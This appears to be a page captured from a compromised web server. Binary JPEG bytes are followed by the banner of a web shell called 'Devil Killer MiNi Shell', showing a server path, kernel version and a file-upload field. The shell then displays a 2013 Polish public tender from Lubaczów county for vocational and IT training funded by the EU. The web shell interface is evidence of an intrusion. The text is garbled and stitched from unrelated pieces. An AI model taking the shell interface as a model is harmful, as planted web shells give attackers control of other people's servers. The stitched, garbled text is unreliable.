JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/325162-N-2013.html

<p class="kh_header"><b>Lubaczów: Realizacja szkoleń, praktyk, zajęć wyrównawczych i pozalekcyjnych oraz wyjazdów dydaktycznych dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP V

Zadania od 1 do 4</b><br>
<b>Numer ogłoszenia: 325162 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Lubaczowski , ul. Jasna 1, 37-600 Lubaczów, woj. podkarpackie, tel. 016 6328700, faks 016 6328709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubaczow.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja szkoleń, praktyk, zajęć wyrównawczych i pozalekcyjnych oraz wyjazdów dydaktycznych dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP V

Zadania od 1 do 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja szkoleń,  praktyk, zajęć wyrównawczych i pozalekcyjnych oraz wyjazdów dydaktycznych dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP V. Projekt jest współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Uczestnikami projektu będą uczniowie i nauczyciele Zespołu Szkół im. Gen. J. Kustronia w Lubaczowie oraz Zespołu Szkół w Oleszycach.
2. ZADANIE NR 1 - Kursy zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1) Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Lubaczowie w wymiarze 10 godz. lekcyjnych,
2) Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Oleszycach w wymiarze 10 godz. lekcyjnych,
3) Obsługa programu Optima - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, I grupa 22 osoby,  w wymiarze 21 godz. lekcyjnych,
4) Rozliczanie działalności handlowej z obsługą kas fiskalnych - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, I grupa 22 osoby,  w wymiarze 7 godz. lekcyjnych,
5) Obsługa kas fiskalnych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie, I grupa 8 osób, II grupa 8 osób,  w wymiarze 7 godz. lekcyjnych dla każdej grupy,
6) Kurs spawania metodą 1,2,3 - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 16 osób,  w wymiarze 33 godz. lekcyjnych teoretycznych i 200 godz. lekcyjnych praktycznych,
7) Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 12 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
8) Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 15 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
9) Kurs Kierowca - operator wózków jezdniowych napędzanych - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 15 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
10) Kurs Kierowca - operator wózków jezdniowych napędzanych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 11 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
11) Kurs Kierowca - operator wózków jezdniowych napędzanych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 12 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
12) Kurs wizażu i stylizacji - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Fryzjer  I grupa 26 osób w wymiarze 65 godz. lekcyjnych (w tym 25. godz. teoretycznych i 40 godz. praktycznych),
13) Kurs stosowanie środków ochrony roślin przy użyciu spryskiwaczy - kurs  dla uczniów Technikum ZS w Oleszycach kierunek:  Technik Rolnik oraz dla uczniów Zasadniczej Szkoły Zawodowej w Oleszycach kierunek: Rolnik, I grupa - 10 pełnoletnich osób, II grupa 10 pełnoletnich osób, w wymiarze 14 godzin lekcyjnych dla każdej grupy,
14) Kurs z zakresu pielęgnacji upraw leśnych i młodników na gruntach porolnych  dla uczniów - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Leśnik, I grupa 10 osób, w wymiarze 20 godz. lekcyjnych w ciągu 4 dni,
15) Kurs z zakresu pielęgnacji upraw leśnych  i młodników dla nauczyciela - 1 nauczyciel ZS w Oleszycach, w wymiarze 14 godzin lekcyjnych przez 2 dni,
16) Kurs obsługi pilarek i kos spalinowych - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Leśnik, 3 grupy po 5 osób, w wymiarze 12 godz. lekcyjnych dla każdej grupy (2soboty po 6 godzin dla każdej grupy)i,
17) Kurs z zakresu wykonawstwa i montażu małej architektury ogrodowej i drewnianej - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Architektury Krajobrazu, I grupa 5 osób, II grupa 5 osób, 4 dni po 4 godziny dla każdej grupy.
3. ZADANIE NR 2 - Szkolenia informatyczne - zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1) AutoCAD/Mechanikal dla uczniów - 12 uczniów ZS w Lubaczowie, w wymiarze 40 godz. lekcyjnych,
2) Kurs Inventor dla uczniów - uczniowie ZS w Lubaczowie 2 grupy po 12 osób, w wymiarze 40 godz. lekcyjnych dla każdej grupy,
3) Kurs  projektowania w  programie AutoCaD  - budowa części maszyn rolniczych - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Architektury Krajobrazu, Technik Rolnik oraz dla Zasadniczej Szkoły Zawodowej kierunek: Rolnik,  I grupa 10 osób, II grupa 10 osób, w wymiarze 9 godz. lekcyjnych dla każdej grupy.
4. ZADANIE NR 3 - Kursy / Szkolenia informatyczne dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1) Kurs: Wdrażanie i obsługa infrastruktury sieci systemu Microsoft Windows Server  2003 oraz zarządzanie nią - 2 nauczycieli ZS w Lubaczowie, w wymiarze 30 godz. lekcyjnych,
2) Kurs Academia Cisco dla uczniów - kurs dla uczniów Technikum Informatycznego ZS  w Lubaczowie, I grupa 15 osób,  w wymiarze 120 godz. lekcyjnych,
3) Kurs ECDL dla uczniów - kurs dla uczniów Technikum Informatycznego ZS w Lubaczowie,  I grupa 15 osób, w wymiarze 120 godz. lekcyjnych.
5. ZADANIE NR 4 - Praktyki dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1) Zajęcia praktyczne terenowe w gospodarstwach rolnych - I grupa 10 osób, w wymiarze 3 dni po 6 godz. zegarowych,
2) Praktyka ponadprogramowa w gospodarstwach ogrodniczych - I grupa 5 osób, w wymiarze 5 dni roboczych,
3) Praktyka zawodowa 4-tygodniowa - dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 26 osób,  w wymiarze 160 godz. lekcyjnych w ciągu 20 dni roboczych.
5. Szkolenia realizowane będą w salach lekcyjnych Zespołu Szkół w Lubaczowie oraz Zespołu Szkół w Oleszycach lub w innym miejscu przypisanym do danego szkolenia. Sale szkoleniowe powinny być wyposażone w niezbędne pomoce dydaktyczne, przystosowane sprzętowo do tematyki prowadzonych zajęć. 

6. Do obowiązków Wykonawcy należy:
a) zapewnienia odpowiednich materiałów dydaktycznych dla uczestników oraz oznaczenia ich odpowiednimi logami wymaganymi przy projektach realizowanych z POKL-u.
b) przeprowadzenia 2 ankiet (na początku i na końcu realizacji każdego z w/w działań) wśród uczestników. 
c) wydania zaświadczeń o ukończeniu poszczególnych szkoleń/kursów/praktyk z podaniem liczby godzin oraz  oznaczenia ich odpowiednimi logami wymaganymi przy projektach realizowanych z POKL-u.
d) zapewnienia dla wszystkich uczestników szkoleń/kursów/praktyk wyżywienia (dotyczy tych form wsparcia dla których przewidziano wyżywienie uczestników)
e) pokrycia kosztów biletów w obie strony - dojazd uczniów z miejsca zamieszkania do szkoły i z powrotem (dotyczy praktyk w których przewidziano zwrot kosztów dojazdu),
f) ubezpieczenia uczestników (dotyczy praktyk w których przewidziano wykupienie grupowego ubezpieczenia),
g) pokrycia kosztów noclegów (o ile zachodzi taka konieczność)
h) zapewnienia opiekunów praktyk/ wyjazdów.
i) przeprowadzenia egzaminów Cisco oraz ECDL CORE 7 modułów i wydania uczestnikom stosownych certyfikatów,
j) zapewnienie przeprowadzenia przez Urząd Dozoru Technicznego egzaminów i wydania uczestnikom stosownych certyfikatów (dotyczy tych form wsparcia gdzie przewidziano przeprowadzenie egzaminów przez ww. Urząd).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż  50% zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na podstawie art. 45 ust. 2 ustawy Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Dopuszczalne zmiany treści zawartej umowy oraz warunki dokonania takich zmian zostały określone w § 7 wzoru umowy: 
§ 7.
1. Zakazane jest dokonywanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.
2. Dopuszczalne są następujące zmiany treści umowy:
a. zmniejszenie zakresu zamówienia w przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkoleń / praktyk / wyjazdów dydaktycznych dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, 
b. zmiana terminów organizacji poszczególnych szkoleń / praktyk / wyjazdów dydaktycznych, jeżeli będzie to podyktowane względami organizacyjnymi,
c. powierzenie Podwykonawcy określonego zakresu realizowanego zamówienia pod warunkiem, że Zamawiający nie zastrzegł, że dana część zamówienia nie może być powierzona Podwykonawcom,
d. wydłużenie okresu realizacji zamówienia w przypadku braku wymaganej liczby uczestników szkoleń / praktyk / wyjazdów dydaktycznych z przyczyn leżących po stronie Zamawiającego. 
3. Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubaczow.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lubaczowie, ul. Jasna 1, 37-600 Lubaczów, pok. nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Lubaczowie, ul. Jasna 1, 37-600 Lubaczów, pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 - Kursy zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja następujących kursów: 1) Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Lubaczowie w wymiarze 10 godz. lekcyjnych,
2) Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Oleszycach w wymiarze 10 godz. lekcyjnych,
3) Obsługa programu Optima - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, I grupa 22 osoby,  w wymiarze 21 godz. lekcyjnych,
4) Rozliczanie działalności handlowej z obsługą kas fiskalnych - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, I grupa 22 osoby,  w wymiarze 7 godz. lekcyjnych,
5) Obsługa kas fiskalnych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie, I grupa 8 osób, II grupa 8 osób,  w wymiarze 7 godz. lekcyjnych dla każdej grupy,
6) Kurs spawania metodą 1,2,3 - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 16 osób,  w wymiarze 33 godz. lekcyjnych teoretycznych i 200 godz. lekcyjnych praktycznych,
7) Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 12 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
8) Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 15 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
9) Kurs Kierowca - operator wózków jezdniowych napędzanych - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 15 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
10) Kurs Kierowca - operator wózków jezdniowych napędzanych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 11 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
11) Kurs Kierowca - operator wózków jezdniowych napędzanych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 12 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
12) Kurs wizażu i stylizacji - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Fryzjer  I grupa 26 osób w wymiarze 65 godz. lekcyjnych (w tym 25. godz. teoretycznych i 40 godz. praktycznych),
13) Kurs stosowanie środków ochrony roślin przy użyciu spryskiwaczy - kurs  dla uczniów Technikum ZS w Oleszycach kierunek:  Technik Rolnik oraz dla uczniów Zasadniczej Szkoły Zawodowej w Oleszycach kierunek: Rolnik, I grupa - 10 pełnoletnich osób, II grupa 10 pełnoletnich osób, w wymiarze 14 godzin lekcyjnych dla każdej grupy,
14) Kurs z zakresu pielęgnacji upraw leśnych i młodników na gruntach porolnych  dla uczniów - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Leśnik, I grupa 10 osób, w wymiarze 20 godz. lekcyjnych w ciągu 4 dni,
15) Kurs z zakresu pielęgnacji upraw leśnych  i młodników dla nauczyciela - 1 nauczyciel ZS w Oleszycach, w wymiarze 14 godzin lekcyjnych przez 2 dni,
16) Kurs obsługi pilarek i kos spalinowych - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Leśnik, 3 grupy po 5 osób, w wymiarze 12 godz. lekcyjnych dla każdej grupy (2soboty po 6 godzin dla każdej grupy)i,
17) Kurs z zakresu wykonawstwa i montażu małej architektury ogrodowej i drewnianej - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Architektury Krajobrazu, I grupa 5 osób, II grupa 5 osób, 4 dni po 4 godziny dla każdej grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p></li>
